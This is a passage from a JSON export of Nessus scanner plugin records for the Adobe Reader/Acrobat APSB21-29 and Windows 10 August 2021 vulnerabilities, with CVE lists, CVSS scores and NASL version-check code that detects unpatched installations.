therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30194 / 2020.001.30020 / 2021.001.20149 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Reader');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20149', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:42", "description": "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149379", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149379);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Reader', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:04:19", "description": "The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149381", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149381);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30194 / 2020.001.30020 / 2021.001.20150 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Acrobat');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:24", "description": "The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149380", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149380);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Acrobat', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", 